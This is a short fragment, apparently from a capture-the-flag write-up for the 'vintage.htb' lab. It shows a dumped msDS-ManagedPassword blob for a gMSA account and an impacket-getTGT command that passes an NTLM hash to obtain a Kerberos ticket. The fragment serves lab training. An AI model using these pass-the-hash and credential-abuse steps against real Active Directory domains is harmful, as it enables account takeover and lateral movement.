Dark_Man

 msDS-ManagedPassword.B64ENCODED: c6qwf6x+EXiEYKGhCu/wTBcnxxxxxxxxxxxxxxxxxxxxxxCaIhn2MobwBxF4Q6fd3W5P13wvh2Jf/Wp2WHsjIEjkbF0duDHoCBAK31Q+BoQg0eUHbsRcksNrkLcPtkZ5eUhK+TzgpXeFKt0VCOWFkAOStKE1H5PDfUGoC2xuP+Tceg7iV0IcMBaR8Db3UgqaqP2LLRiimuL6ZO4xl6sSRKrdRQEQOR7L9fFw9JW7myCsbj2TPxFc5WaMQtWi456OvwBQn4jhdty5tSjv2uMlcq+sQMz60voxH6sClACPGKJMCr2FNVJP6dd1GTdvh6n5Dbh/yhHCAF8UzYeGXv2Nx3Dw==

-Get a Kerberos ticket for GMSA01$
+Get a Kerberos ticket for GMSA01$ the account.

 └──╼ $impacket-getTGT vintage.htb/'gmsa01$'@dc01 -hashes :54311f0ed05b807a7aaf5943b595f224